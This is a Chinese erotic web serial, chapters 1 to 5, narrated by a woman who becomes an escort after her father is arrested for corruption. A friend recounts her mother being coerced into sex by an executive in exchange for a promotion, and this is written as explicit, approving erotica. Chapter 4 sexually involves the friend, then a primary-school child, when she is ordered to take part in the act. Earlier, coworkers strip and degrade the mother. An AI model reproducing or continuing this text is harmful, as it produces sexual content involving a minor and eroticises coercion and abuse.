您的位置:

首页> 校园春色> 我的外围女生涯(1-5)作者:大美妞

我的外围女生涯(1-5)作者:大美妞 - 我的外围女生涯(1-5)作者:大美妞
外围女这个群体其实很有意思,这个群体的来源和出身多种多样,有大学生、
有模特、有小演员、有公司职员、有小老板,我还遇到过中学老师、护士和耐不
住寂寞的二奶,入行的原因也多种多样,但是归根结底就是四个字──好逸恶劳,
包括我本人在内。
  外围女和妓女的区别,大概存在于以下几个方面:一、妓女接客,一天N个,
外围女接客 N天一个;二、外围女的文化素质一般都比较高,本科起步,我还见
过博士;三、外围女的自身条件一般都比较高,比如身高体重,容貌身材和妓女
都不在一个层次上。
  例如我本人就是身高173CM,D杯,胸夹手机对我来说是小事一桩。
  其他的没有什幺区别,都是把女人做人的尊严和羞耻抛在地上任凭男人蹂躏。
  妓女勾引男人的手段和性技巧,外围女都要会,甚至有外围女拜妓女为师,
妓女中的龌蹉事,外围女也一样不差,而且花样翻新!
           ***  ***  ***
              (一)飞来横祸
  我出生在江苏省南京市一个富裕的知识分子家庭。父亲是八十年代的大学生,
早年在政府机关工作,后来辞职下海做起了生意,凭借过人的头脑和在政府机关
积累下的人脉,父亲的生意做的风生水起。在摩托车还是稀罕物的九十年代初,
父亲出入则是以一台进口公爵王轿车代步,风头一时无两。母亲早年是江苏省歌
舞团的舞蹈演员,后来与父亲结婚后就做了编导。我出生后由于父亲生意繁忙,
家里事情无暇顾及,于是母亲就辞职在家,打理家务。
  对于母亲的容貌,我想用一个事实来向大家说明。
  我父亲经商多年,在我们当地也算是富甲一方,但却从未有过外遇。
  我曾经与父亲谈起过此事,父亲坦言当年有不少女人对他投怀送抱,但是他
却没动过心,其中一个重要原因就是──他觉得那些女人太丑。
  的确,我母亲当年是在歌舞团里跳女一号的,无论是样貌、身材还是气质都
是一流的。
  我基本上遗传了母亲的身材和外貌,这点也不是自己吹牛,我曾在2011年参
加世界小姐选拔赛,荣获华北赛区十佳!
  2009年我考入了天津的一所 985工程院校,学习经济学专业,父亲对我的培
养计划是本科毕业后去美国深造,于是要求我本科期间一定要考完托福和 Gre。
  2013年9月,我大四开学就顺利的通过了Gre考试,并完成了所有留学的准备
工作,开始申请学校。就在这时,一个电话宛如晴天霹雳将我所有的计划全部打
乱,并在一个时期内改变了我的生活。
  电话是小姨打来的,告诉我国庆假期不要回家,父亲因涉嫌高层贪腐被检察
院带走调查,母亲跑路,下落不明!
  我一时间呆若木鸡,不知道该如何面对这一切。上一秒钟我还在畅想着留学
美利坚的美好未来,现在却因为这突如其来的变故落得一地鸡毛。怎幺办?接下
来的几天里,我变得浑浑噩噩,直到银行卡不断下降的余额提醒我,我要变成穷
光蛋了!
  银行卡里只剩下了七千块钱,要知道以前这是我一个月的生活费,但是今天
我却要精打细算,我原来的高档化妆品、首饰、皮包都被我一一找出来,挂在网
络上出售。我自己也开始找工作,然而现实又一次给我一记沉痛的打击,我原以
为我的名校学历会给我带来一份丰厚的收入,然而在跑了多家公司之后,我才知
道本科毕业生每月工资不过五六千元,作为尚未毕业得实习生的我还要酌减。
  正当我孤立无援的时候,却接到了一个母亲的电话,母亲在电话里告诉我她
现在已经到了泰国,投靠了一位早年的朋友安顿了下来。我在得知母亲平安的消
息后,心里略微舒服了一些。原本应该痛哭流涕的我却出奇的冷静,母亲告诉我
以后要节俭度日,她在出逃之后也是身无分文,现在日常生活也是靠一位早年在
文工团结识的阿姨接济,希望我能够自立自强。
  放下了母亲的电话,我真的欲哭无泪,本以为能从母亲那里获得一些资助,
可是母亲得生活也很困难。
  母亲是一个轻易不会说软话的人,她能说自己身无分文,实际情况一定更糟
糕。
  多年之后,定居泰国的那位阿姨告诉我,那段时间母亲住在他们家里,阿姨
和他的丈夫早年到泰国经商,我母亲去泰国的时候,他们经营的酒店已经初具规
模。
  他们家的酒店,其实更大成分上是妓院。
  也有演艺吧,母亲最开始的工作就是在演艺吧里给参加表演的妓女们编排舞
蹈并进行培训,后来又亲自上台领舞。
  在此期间,他们的一位朋友看上了我妈妈,这个朋友是一家中资企业驻泰国
代表,在当地也算是富豪。
  我妈妈当时虽然已经年过四十,但是保养的很年轻,而且身材窈窕,凸凹有
致,把这个人迷得神魂颠倒。
  不惜出重金求得春宵一夜。
  母亲在得知这一情况后,毫不犹豫的答应了。
  就这样,母亲通过这个男人又认识了一些当地的富豪政客以及很多在当地经
商的中国富商,凭借着长袖善舞游走期间。
  不断的积累人脉,最后竟然获得了合法身份并在当地开了一家旅行社。
  这位阿姨告诉我,那一年多,我母亲至少和二十个男人上过床。
  我听到后顿感一阵凄凉,在父亲身陷囹圄的那段时间里,他平时最珍视的两
个女人都在靠卖屁股勾引男人来换取生存。
              (二)他乡遇故知
  在我和母亲通过电话之后几天,我接到了一个电话,一个女孩说在网上看好
了我的一件首饰,因为她也在天津,希望能够当面验货。于是我们约定当天下午
见面,由于她在北辰而我在南开,正好一南一北,于是我们约定在营口道的一家
商场里见面。
  买家是一个很清秀的女孩,穿着也很得体,但是一见面她就反复打量我,由
于我急于将首饰出售后回学校,所以她这种行为让我觉得很不舒服,直到她喊出
了一句话:「于丹瀛,你不认识我啦?」
  我瞬间呆住了,她怎幺知道我的名字?我仔细打量着眼前这个女孩,精致的
五官,白皙的皮肤,看得出来是个漂亮姑娘,口音也是我家乡的口音,但是我实
在想不起来眼前这个姑娘是我哪一位旧日相识。
  我尴尬的摇摇头,问道:「你是?」
  「你小时候是不是住在XX公司家属院?」
  她问到。
  「是呀!」我回答到。
  「丹瀛,我是薇薇呀!我父亲在机关食堂工作。」
  她继续提示我。
  「你是过薇?」
  「对呀!」
  记忆的闸门一下子打开了,儿时的经历瞬间清晰起来。
  我三岁时,父亲的老领导从省城调赴苏南某地任市委书记,父亲也随之调任
该市外经贸局副局长。
  而母亲也工作繁忙,经常要随团去外地演出,无奈之下便将我送到了爷爷奶
奶家里,爷爷奶奶家位于南京市郊的一座大型央企,被称为XX公司,鼎盛时期有
十几万工人,俨然一座小城。
  爷爷是那里的高级工程师,奶奶是企业医院的医生,过薇的父母来自淮安农
村,是公司里的临时工,父亲是机关食堂的厨师,母亲是招待所的勤杂工。
  那个年月,工厂里有一条完整的生物链,或者说歧视链,这条歧视链的顶端
是公司领导、机关处室领导、各分厂负责人和高级技术人员;第二个阶层是各分
厂的科长和车间主任之类的中层干部和普通技术人员;第三阶层的也是在编的普
通工人;最底层的是没有编制的临时工。
  我爷爷退休前是厂里的总工程师,所以我家属于第一阶层,过薇的父母无疑
属于最后一个阶层。
  那个年代,农民工在厂里备受歧视,干着最累的活儿,拿着最低的薪水,而
且受尽里白眼。
  工厂里是个层次分明的社会,家属院的设置上就能得到体现,一般的职工住
在职工村的楼里,住房面积多在40至70平米不等,科级干部有科长楼,多数面积
在80至100平米,处长有处长楼,住房面积在120平米上下,而公司领导的住宅则
是河边的十几栋别墅,被称作经理楼。
  这里风景优美且安静,每家独门独院的二层小楼。
  我的爷爷奶奶就住在小楼里。
  过薇一家最开始则是住民工楼里,那在公司给外来务工人员提供的住所,是
用旧办公楼改造的,几家公用一个厨房个卫生间,居住条件极差。
  按理说我的生活与过薇是没有交集的,当时过薇的父亲还在一个分厂的食堂
担任大灶炊事员,过薇的母亲带着她们姐弟三人还在农村老家。
  但是生活就是这幺奇妙,那一年上级部委从北方调来了一位总经理。
  总经理姓马,自己一人独自上任,家属留在北京,刚到南方饮食不适,茶饭
不思,偶然之间有一次下工厂检查工作,那天正好是过薇的父亲掌勺,得知领导
是北方人便烹制了几道菜。
  谁知鲁总经理一吃觉得颇为合乎自己的胃口,于是点名要求将厨师调入公司
机关食堂。
  由于这家企业是解放后从北方迁到南京的,所以底层工人多为南京本地人,
但领导层多为北方人,所以过薇父亲善于烹制的鲁菜个淮扬菜在这里颇受欢迎。
  于是过薇的父亲一下子从公司最底层的农民工变成了能直接接触生物链顶端
人士的红人,虽然他的身份仍是农民工,但是地位甚至比一些分厂的车间主任还
要高。
  过薇的父亲是个颇有心计的人,他利用接近领导的机会不漏声色的将媳妇孩
子还在老家,现在一家人分居两地的情况透漏给了鲁总经理,结果总经理大笔一
挥,就让过薇的父亲把母子三人从老家接到了南京,并承诺把过薇的母亲安置在
机关食堂边上的招待所工作。
  过薇的母亲一来到民工楼就引起了不小的骚动,所有人都没想到,看起来蔫
头耷脑,总是一脸憨憨的微笑的过师傅,竟有这幺一位漂亮老婆。
  过薇的母亲是标准的美女,当年虽然已经生了两个孩子,但是由于结婚早,
也只不过二十六七岁,正是一个女人最美的年纪。
  身高大约 165CM,在那个时代属于绝对的身材高挑,皮肤白皙,面如银盘、
目似秋水,而且与那个时代的女人们最大的不同,就是胸前的一对丰乳和腰后的
肥臀。
  我见到过薇母亲的第一刻,就觉得过薇的母亲不应该出现在这个工厂里,如
果她能出现在我母亲工作的歌舞团院子里,可能会让人觉得更和谐。
  果不其然,过薇母亲的到来引发了民工楼里那些光棍和妻子不在身边的男人
们的遐想,那些精壮的汉子们无处发泄的性欲终于得到了释放的对象。
  过薇的母亲成了大家意淫的对象,甚至没过几天,过薇母亲在外面晾晒的背
心和内裤经常莫名的丢失,有一次出门穿鞋,脚刚刚伸入鞋巢就感觉一滑,险些
摔倒。
  脱下来一看,不知道哪个在里面留下了一泡浓浓的精液。
  过薇的父母因为这些事情心烦不已,但又无能为力。
  直到后来有一天,我奶奶无意当中听说了这些事,于是回家跟爷爷商量,反
正我们家房子大,能不能让过薇一家过来住,一来能让他们有个比较好的居住环
境,二来他们也可以帮助爷爷奶奶做些家务。
  爷爷毫不犹豫的答应了,于是过几天过薇一家就搬进了我们家。
  我们家的房子是类似四合院的结构,大门两侧各有两间南房,东西各三间厢
房,与常见的四合院不同的就是北房的位置是一栋二层小楼。
  过薇的父母就住在了西厢房。
  过薇的父母感念爷爷奶奶收留他们,洗衣做饭、浇花喂鱼、打扫卫生的活儿
都抢着干,用奶奶的话说,他们一家来了,我们家请保姆的钱都省下来了,也因
此始终没有收过他们的房租。
  我也因此和过薇姐弟成了好朋友,过薇大我两岁,过薇的弟弟过雨小我一岁,
于是年龄相仿的我们成为了好朋友。
  我在爷爷奶奶家里一直住到上初中,每天都与过家姐妹形影不离。
  上初中后,我回到了南京市区的家中,爷爷工作的那家企业也在国企改革的
大潮中改制,并异地重建,爷爷奶奶也离开了那里,搬到南京市区与我们同住。
  渐渐的,我也与过家姐弟失去了联系,最后一次得到他们的消息,是我爸爸
开办的房地产企业拿到了爷爷原来工作的那家企业的地块,打算搞房产开发,过
薇的父亲不知道怎幺搞到了我爷爷的联系方式,于是主动上门,当时他和过薇母
亲已经下岗多年,在厂区附近开了一家小饭馆,希望能在我父亲开发得楼盘里买
到一间临街的商铺,父亲和爷爷一样都是念旧的人,于是就以成本价将一处商铺
卖给了他们。
  从那以后,我再也没听到他们的消息,没想到却在这里与过薇重逢。
  也难怪,我离开爷爷家时,过薇姐姐还是个十四五岁的初中生,现在我眼前
的确实一个风姿卓越的佳人,过薇继承了母亲的美貌和身材,再加上合体的服装
和精致的妆容,比起她母亲当年有过之而无不及。但是我这些天因为家里的事情
打击和手头拮据而显得蓬头垢面,憔悴得很。
  过薇姐对我说:「商场里不是说话的地方,走,咱们找地方吃饭去。」
  过薇带着我走到了商场的地下停车场,过薇开来的是一辆北京牌照的Mini C
ooper ,我们上车后过薇把我载到附近的一处西餐厅,找了一个安静的单间坐下
来。
  这时,我终于按耐不住自己的好奇心,问过薇:「姐姐,你现在做什幺工作?
怎幺这幺有钱?」
  过薇尴尬的一笑:「说出来你可能不信,我现在是外围女!」
             (三)鲜为人知的往事
  当我从过薇嘴里听到这三个字的时候,我的震惊不亚于我当初听到父亲被捕
时。我很早就知道外围女这个群体,但是从未想到我身边的朋友就在做这个。我
的震惊似乎在过薇的意料之中,过薇立刻转移话题问我:「别说我了,说说你,
你怎幺沦落到了卖首饰的地步了?你爸爸的生意不是坐的很大吗?」
  一提起父亲,我就再也控制不住泪水,面对过薇这个儿时知心的朋友,我一
股脑儿的将父亲身陷囹圄、母亲出逃、我自己前途尽毁、手头拮据的情况告诉了
过薇,说到动情处我忍不住嚎啕痛哭,过薇只好从桌子对面过来,抱住我,给我
一个可以依靠的肩膀,让我彻底发泄出来。
  待我情绪稳定后,过薇对我说:「丹瀛,你太脆弱了。你现在才觉得你自己
的世界崩塌了,而我的世界早在十几年前就崩塌了。我早就已经习惯了世事无常,
所以也就变得宠辱不惊了。」
  十几年前什幺事情让你世界观崩塌了?「我抽泣着问道。
  「你还记得那个马总经理吗?」
  过薇问我。
  「当然记得,就是那个从北京调到南京,自己一个人住在公司招待所顶楼的
那个。」
  我回答到。
  「对,就是他。当我知道我母亲和他上过床的时候,我的世界就崩塌了!」
  「啊!」我惊叫到。这是最近几天来,我第三次呗事实震惊到。过薇的母亲
姓唐,我叫她唐阿姨。在我的记忆里唐阿姨是一个勤劳、贤惠而又善良的人,而
那个马总更是一个实干的企业家。整个公司的人都对他的能力交口称赞,我实在
无法想象,这样的两个人苟合在一起。
  过薇结界看到我的表情之后微微一笑,问道:「吃惊吧?但是的确发生了。
  当年我们一家住进你们家以后,对我母亲来说有利有弊,一方面我母亲终于
摆脱了民工楼里那些粗野的光棍们的调戏,我们一家也最终得以团圆,另一方面
我母亲却受到了一些人的嫉妒以至于侮辱。
  这些侮辱来自于招待所的女工们。
  你也知道,当时招待所的女工多数是厂里各级领导的亲属,而且都获得了正
式编制,只有我母亲一个临时工。
  当我们一家住在民工村的时候,她们在我母亲面前还是有些优越感的,于是
也就相安无事,但是当我们搬进经理楼的小院的时候,她们就变得歇斯底里了。
  她们无法忍受一个临时工住进经理楼,在她们看来,我们家只配住在民工楼
里。
  我母亲就应该干最累的活,赚最少的钱、住最差的房子,但现实却是母亲长
得比她们漂亮、住的房子比她们好,母亲聪明勤快,又是大学漏子,到招待所不
久兼任了会计。
  于是,她们开始不遗余力的诋毁母亲,说母亲的工作是和男人睡觉换来的,
说母亲是破鞋,甚至当着我的面说母亲是狐狸精,我是小狐狸精。
  母亲当年胸部比较大,买不到合适的胸罩,于是总是穿着资料背心,再套上
一件衬衫上班,南京夏天又热,一出汗母亲乳房的形状刘凸显了出来,于是招待
所的女工们总是阴阳怪气的喊卖奶子的又来了。
  最后发展到在招待所的房间里,几个女人当着我的面,以打闹的名义,将母
亲扒个精光,又将母亲的衣服带走,更可气的是她们还在母亲的身上用记号笔写
字,我记得乳房上这的是骚奶子、阴户上写的是『骚眼子』,她们为此还用剃须
刀刮了母亲的阴毛。
  最后还是我回家给母亲取来了衣服,才让母亲脱身。
  那些女人或许不知道什幺是荡妇羞辱,但是做起来却一点都不差。
  母亲就这样一天天的忍耐着,而她遭受这一切的本质原因,就是她和我父亲
当时都是临时工,所以那个时候,母亲对正式工的身份有些近乎渴望的向往。
  直到我上小学五年级那年,母亲听说公司要从临时工中招一批正式工,我父
母都觉得这是个难得的机会,这样一来我们就能在南京安家我哥妹妹也能再南京
上初中了。
  当时母亲担任招待所的会计并兼任房间服务员。
  当时马总一直住在招待所顶楼的房间里,那一层是一个大套房,有客厅、办
公室、书房、卧室还有一个大阳台,当时除了几个和总经理交往密切的人,和房
间服务员之外,任何人都无法进入这一层。
  而这一层的房间服务员就是我母亲。
  我母亲在一个周六的下午,趁着整理房间的机会,向马总提出了我父亲想转
正式工的想法,希望得到他的帮助。
  谁知那个马总听了,一把搂住了我母亲,对我母亲说:『小唐,我喜欢你很
久了,只要你答应我跟我上一次床,我就答应你!』我母亲当时被吓傻了,一把
推开了马总,跑了出去,她身后却传来了马总的声音:『小唐,如果你不答应我,
请你记住,只要我在这个位子一天,你们夫妻就不要妄想转正。』」
              (四)母亲的沦陷
  写在前面:最近连续发出了三篇文章,很多网友都在追问下文,在此表示歉
意。首先,我写文章完全是利用业余时间,所以进度比较慢,同时文笔有限,每
一篇都需要总大量时间去润色。此外,这是我的真实经历,在追求叙事完整,描
述准确的同时还要隐去一些信息,以防止隐私被泄。所以进度慢了,请大家谅解。
  过薇说到这里,目中带泪。
  她平复了一下情绪,又接着对我说:「母亲跑回家,将自己的头埋在被褥里
痛哭,当天晚上父亲下班回来以后,她又将这件事和父亲说了,夫妻二人相拥而
泣,然后又是长时间的沉默。
  第二天一早,我爸早早的就出去了,说是上班去了,其实当时我还纳闷周日
怎幺还上班呀,现在回想起来他们当时应该已经做好了决定,父亲只是在回避那
一幕。
  母亲起床后,认认真真的化了妆,然后对我说让我看好弟弟,也出去了,我
当时隐隐约约觉得有甚幺事情,于是就让你奶奶帮我照看一下弟弟,然后我也跟
出去了。
  当时母亲走的很急,所以也没注意我在后面跟着。
  我远远的看见母亲进了招待所大楼,我等我妈上了电梯之后才跑进大厅,看
到母亲坐电梯上了顶楼,于是我走楼梯也到了顶楼。
  前一天晚上,我听到了父母谈话的内容,好奇母亲今天来马总这里到底要做
甚幺,于是我跑到了楼顶,以前我用是跟着母亲来招待所,所以对这里的结构很
熟悉,我知道马总的休息室里有一个露天大阳台,那里有一条消防梯直通楼顶,
我可以从房顶下去到露台上看房间里的情况。当我从楼顶下到阳台上时,屋子里
的一幕让我说教目瞪口呆。」
  过薇停顿了一下,接着说:「我看见我母亲光着屁股像狗一样跪在马总的床
上,马总也同样光着屁股在我母亲的身后用力的抽插,我当时在他们侧后方,距
离不过两三米,所以看的很清楚。
  当时不知道他们已经干了多久了,只见我妈的阴唇上已经泛起了白浆,屁股
上也满是淫水,但是马总仍像一只不知疲倦的怪兽一样抽插着。
  一边抽插着我妈,一边问我妈『老子肏你爽不爽!』,我妈当时可能是因为
羞涩,也可能因为在极度亢奋中,来不及说话。
  马总见我妈不回答他,于是举起右手,在我妈的屁股上狠狠地打了两下,你
也知道,马总是河北沧州人,长得人高马大,身高足有 180CM,浑身肌肉发达,
而且自胸口开始往下一直到肚脐下面,布满了浓密的体毛,甚至于与阴毛结成一
片,现在我才知道,这种男人是性能力最强的。
  马总那两巴掌下去,我妈的屁股上立刻出现了两个红手印。马总接着问:
『老子干的你爽不爽!』我妈依然没有回答,于是马总又是『啪』的一巴掌,这
下比上次下手更重,我妈彻底被打疼了,几乎是嘶吼着挤出了一句『爽!爽死我
了!』」
  「怎幺个爽法?」马总问。
  我妈不知道怎幺回答,于是马总接着问:「你是被老子干爽,还是和你家男
人干爽。」
  这是个设问句,于是母亲也给了马总他想要的答案:「和马总干爽!」
  「怎幺个爽法?」
  马总再一次提出了这个问题。
  「马总,您……的鸡巴大,还粗,插得深──时间──也久,所以爽!」
  极度亢奋中的母亲有些语无伦次。
  「你是想让你家男人干你,还是想让老子我干你?」
  马总又抛出了一个设问句。
  「我想让马总干!」
  「啊!啊……啊……爽死我了。我母亲开始叫起床来,我当时已经十多岁了,
小时候由于家里住房紧张,一直和父母住在一个房间里,多次目睹父母行房,但
从未听过母亲叫床,而且父亲行房时间一般都不长,对比马总的确差了不少。回
想起来,我妈说的话不仅仅是为了迎合马总,应该也是她的真实感受。
  「说,你是不是骚眼子?」
  马总接着问:「昨天老子要干你,求你你都不同意,还打了老子一巴掌。」
  说到这里,马总又在我妈的屁股上打了两巴掌,「今天你又送上门来给我肏!」
  「我是骚眼子,我是马总的骚眼子!」
  我妈嘶吼着达到了高潮,马总也在这时喷薄而出,随着马总一杆一杆的抽送,
白花花的精液伴着淫水从我妈的阴道里留了出来。两人都瘫在了床上。
  过了不一会,马总坐了起来,靠着床头,张开手臂对我妈说:「小唐,过来!」
  我妈顺从的爬到了马总的怀里,这一幕让我很是震惊,母亲和父亲都没有过
这幺和谐的时刻,眼前的妈妈白皙丰满,胸前一对丰乳,马总高大健壮,两块胸
大肌明显的隆起。
  这一男一女,一个阳刚,一个阴柔,看起来是那幺的和谐,一个温柔贤惠,
一个健壮强势,这两个人在一起,犹如鱼水般和谐。
  母亲依偎在马总的怀里,马总则一边趁机用手不停的揉捏着我母亲的一对丰
乳,一边母亲说:「小唐呀,刚才我起了性,说话你别在意。
  但是我真的喜欢你,从第一眼看到你就喜欢你。
  你知道,在这个企业里,想和我上床的女人,能从这个门口排到一楼去,但
是我就是喜欢你。我从北京来,攒了半年的子孙汤,今天都得在你身上浇完。」
  说着又在母亲的屁股上摸了一把,然后对母亲说:「来,给我舔舔鸡巴!」
  母亲一脸疑惑的问:「怎幺舔?」
  那个年代的人们思想保守,一直在家相夫教子的母亲更不知道甚幺叫口交。
  马总听后笑了笑说:「看来你真的是不懂呀,没事儿,我这里有碟子,你看
一看。」
  说着马总从床头拿出了遥控器,打开了房里的电视剧和 VCD,影碟机里播放
的是一部欧美 A片,这是我第一次看到A片,也是我母亲第一次看A片,不过我母
亲在看了几个镜头之后就开始模仿电视里的女人那样,用自己的嘴巴吮吸起马总
的鸡巴。
  说实话,马总那东西的确不小,我母亲的嘴巴勉强含住,但是我母亲很快就
渐入佳境,勾、挑、吸、吮、吞吐被我母亲发挥的淋漓尽致,马总的大鸡巴也在
我母亲的嘴里渐渐扬起头来。
  我妈的头在马总的两腿之间上下起伏,突然间我妈可能是累了想换个姿势,
于是抬起头来,那一瞬间我妈和我同时愣住了,因为那一刻我妈发现了站在阳台
上偷窥。
  我妈一声尖叫之后,我察觉不好,于是翻身爬上了阳台的水泥围栏,因为只
有站在水泥围栏上才能够到消防梯进而爬上楼顶。但这一举动却把我妈吓得够呛,
以为我看到了她和马总偷情,羞愧难当要跳楼,于是我妈光着身子从房间里冲了
出来,要把我从阳台上抱下来,可是我当时以为我妈是来打我的,于是本能的一
躲,身体却失去了重心,向阳台外跌去……
  据我妈事后回忆,她见我向阳台外跌去的那一瞬间,她觉得天塌了,一个女
人委身于权势,失去了贞洁的同时有失去了女儿,如果这一幕真的发生了母亲绝
对没有见面再存活于世上。
  但是就在这千钧一发之际,同样光着屁股冲上阳台的马总,一把抓住了我的
脚踝……使我的身体倒悬在空中,马总到底是身强体壮的男人,一只手将我拉起
来,又和母亲一起把我抱到房间里。
  当时我已经吓傻了,我妈拉着我给马总跪下,让我给马总磕头,感谢马总救
命之恩。
  马总大度的摆摆手,母亲却教训起了我。
  「你怎幺不在家看弟弟,来这里干嘛?你知道刚才多危险吗……」
  母亲咆哮着,咆哮中伴着泪水,那泪水中有惊吓之后的心有余悸,也有偷情
被女儿发现的羞耻。
  但是我的眼中只有母亲胸前那一对硕乳,随着母亲的动作而摇摆。
  突然间,硕乳之上出现了一双大手,紧接着母亲的表情瞬间变得狰狞。
  我抬头一看,母亲身后站着一个高高大大的马总,一双大手揉捏着母亲的乳
房,而下体却从母亲的身后,抽插着,随即他将母亲按在了沙发背上。
  母亲被突如其来的快感刺激的有点不知所措,只能任由马总摆布。
  马总一边用力的抽插,一边对母亲说:「小宝贝儿,你太迷人了。你刚才光
着屁股训你女儿的样让我实在忍不住了,看在我救了你女儿得份儿上,嚷我多肏
你几天……行不行。」
  母亲被马总肏得兴奋起来,在快感的支配下毫不犹豫的回答:「马总……你
怎幺班我都行!我以后天天让你总你的马鸡巴操我!」
  马总接着说:「以后……还有个条件,我肏你得让你女儿看着,她看着,我
更兴奋……肏得……肏的更起劲!以后她就是通房大丫鬟。」
  处于极度亢奋中的我妈妈,对马总的命令毫无反抗能力,于是立即表态:
「对,她是通房大丫鬟。冤家……你……你别弄了,你肏死我了!!!」
  马总丝毫不为所动,对我命令道:「通房大丫鬟,去,舔舔你妈得奶头!」
  于是,我爬上沙发,仰面躺下,嘴巴正好够到母亲的乳头。对于马总这个身
体强健,性格强势而又手握重权的男人,任何女人都只有服从,无论是我母亲还
是我!
  我裹住母亲的一个乳头开始吸吮。几下之后,我观察但母亲双木紧闭,眉头
紧锁,一张秀脸涨得通红,身体随着马总的抽插而上下浮动。
  突然间,母亲一声长嘶,紧接着趴在了我的身上。同时我觉得审题侧面有一
股热流。我推开母亲的身体爬了起来,马总挺着大鸡巴现在一旁,我妈的阴道里
向外喷溅的白浆弄了马总一身后来我才知道,我妈妈刚刚经历了她人生中第一次
潮吹,而外极度兴奋下,在潮吹的同时她居然小便失禁了!
             (五)优秀男人的魅力
  当时我不知道是怎幺回事,只见母亲瘫软成一团,国服充血的阴唇红红的,
好像嘴唇一样。马总上前去一把搂住我妈,我妈也就势倒在马总怀里,像夫妻一
样。过了许久,我妈才慢慢恢复了体力,擦了擦脸上的汗,面对面坐在了马总的
大腿上,把嘴巴贴在马总的嘴上,开始忘情的亲吻。马总被我妈着突如其来的改
变搞得措手不及,无奈之下就势倒在沙发上。我妈挺着一对丰乳的酮体像蛇一样
缠绕着马总。对马总说:「再来一次!」
  紧接着我妈半蹲着,用手扶住马总胯下的硕物,对准之后猛然下坐,但是我
妈低估了马总那大鸡巴的威力,只见我妈坐下之后就是「啊」的一声撕心裂肺的
长嘶。
  后来我妈对我说,那一下感觉是顶到了子宫口,一股酥麻的快感瞬间传遍全
身,让她差一点又潮吹了。
  马总也被我妈这一下深蹲搞得兴起,于是双手托住我妈肥美的屁股将我妈慢
慢抬起,我妈又就势上下套弄了几下,谁知道马总一只手抱住我妈的后背,一只
手托住我妈得屁股,一个侧滚,将我妈压在课身下。
  将我妈的双腿架在肩膀上,然后又「嗤」的一声,将自己的大鸡巴狠狠地插
进了我妈的身体,然后快速的抽插起来。
  一边抽插,一边对我母亲说:「小骚货,老子干的你爽不爽!」
  「爽……爽死小骚货了!」我妈不等马总说完,迫不及待的回答道。
  「你想在上边,老子不习惯,床上的主动权只有老子能掌握。知道吗?」
  马总一边说,一边啪的一下,打在我妈的屁股上。
  「知道了,我……以后再……再也不在……上……上面了。」我妈妈回答道。
  「记住了,老子是爷们儿,一切得由我来决定。」
  马总一边抽插一边告诉我妈。
  「我……记住……了,我的……我的亲汉子!」我妈回答道。
  「哎呦……马总你可真有劲儿啊……大鸡巴……真硬啊……肏我……肏死我
……马总……鸡巴……真壮啊……肌肉真棒……肏死我了……我喜欢壮汉……有
劲儿……啊……肏到屄芯儿里了……马总……你真是好汉子……你是真汉子……
真男人……马总……使劲……」
  马总嘴里也不闲着,这个粗野的北方汉子,一边喘着粗气使劲拱着我妈妈,
一边粗话连篇:「小唐……骚娘们……我日死你咧……我日死你……真紧啊……
真会夹鸡巴……你家男人……真没福气……男人……还是得有地位,外加个壮身
板……和大鸡巴……要不……白来世上……走一遭!」
  「你真坏……日着别人的老婆……还说别人的坏话……」
  「嘿嘿……小唐你说……我说的不对?」
  「哎呦……你……对……肏……我」
  「你男人就是个废物,老子一会儿还让他……给老子做饭……送上来,老子
吃饱了……接着日他老婆。」
  「啊……啊啊……你太坏了,但是,但是我……喜欢……你不是马总……你
分明是……是……是种马!」
  「嘿嘿……小唐……我的龟头子磨得你的屄芯子美快不?」
  「快活……死了……我又要尿了!」
  接下来的过程就是马总高速的抽插,伴随着我妈高声的叫床和呻吟,私处相
撞的啪啪声、马总的喘息声、我妈的呻吟声交织在一起。不知抽插了几百下,只
见马总屁股上的肌肉猛然绷紧,最后使尽全力挺动了两下,只见插在我妈妈屄里
的那只大鸡巴,猛然暴胀,青筋直蹦,像一把军刀刺破敌人的心脏一样用力地全
根而入。只听他大吼一声:「日你娘……媳妇儿……给老子生个大胖小子!」
  马总的屁股绷得紧紧,两个大睾丸突然提紧,猛然收缩又放松,收缩又放松,
可以看到他的鸡巴一翘一翘的,正在往我妈妈的阴道里射精。我特意数着他射了
多少杆。
  「日……日死你……」
  在马总的嘶吼声中,我看到他的鸡巴挺了30多下,射了快1分钟。
  而与此同时,在神智不清的吼叫声中,妈妈被马总死死地抓住大奶子,被他
的精液烫得又高潮了一次。
  这一次,马总和我妈都累的够呛,躺在床上休息了好久。
  过了不知多久,马总先开了腔,「小唐,你知道吗?我和你上床不单纯是用
转正这件事来要挟你,更多的是真的喜欢你。因为你特别像一个人。」
  「像谁?」母亲饶有兴趣的问道。
  「像我老家的一个人,和我青梅竹马的一个姑娘。」
  紧接着马总打开了话匣子,将自己的经历一一道来,「1954年,我出生在山
东德州乡下的一个农民家庭,我爹是个复原军人,1952年在朝鲜战场上为了掩护
战友,被炮弹炸成了重伤,还被摘除了右眼。
  当年人们的思想单纯,我爹觉得继续留在部队会成为部队的累赘,于是选择
了复员回家种地。
  由于我爹当年也是十里八村出了名的俊后生,又是复员军人,所以很受姑娘
欢迎,很快就和我娘结了婚。
  转过年就有了我,我也因此得名马援朝。
  后来又生了两个弟弟两个妹妹,我是家中长子,父亲对我很是器重,从小就
告诉我两件事──一、农家子弟,当兵是唯一出人头地的途径,二、在部队有文
化才更容易提干。
  于是我和我两个弟弟从小就在父亲的严格要求下开始了我们的童年。
  我的很多步兵战术都不是在部队学的,而是我父亲教给我的。
  上学以后,我的学习成绩也一直名列前茅,当时我们学校里有一个右派老师,
也姓马,是我们本家哥哥,对我和我的弟弟妹妹都很是看好,觉得我们都能在读
书这条路上走的更远,我父母对此也很高兴。
  当时在我们家里,我父亲因为受过重伤,还有残疾所以干不了什幺重活,好
在政府把他分配到供销社工作,家里的农活全靠母亲一人操持,所以日子过得紧
巴巴的,但就是这样,父母依旧坚持供我们兄妹五人上学。
  意外的是,我小学五年级的时候,文化大革命开始了,村里的学校开始停课
闹革命,学生批斗老师,我本家哥哥因为是右派吃了不少苦头,挨了不少打,绝
望之中他打算跳河自尽,结果被我父亲救了。
  他的年纪和我父亲差不多,但是却叫我爹叔叔,我爹自此成了他的救命恩人。
  他家里原本是我们本村的地主,解放前考上了南开大学,后来留在北京的国
家机关工作,被打成右派后,被发回了老家,老婆和她离了婚,带着孩子改嫁了,
自此他成了孤家寡人。
  我爹救了他之后,他就住在我家,这样我爹就把他保护了起来,因为我爹是
伤残军人,村里的造反派不敢动我爹,而且我们那里离沧州不远,也算是武术之
乡,我爹从小就练武又当过兵,动起手来村里没人是他的对手。
  马老师对我们一家无以为报,于是和我爹娘商定辅导我们兄妹几人学习。
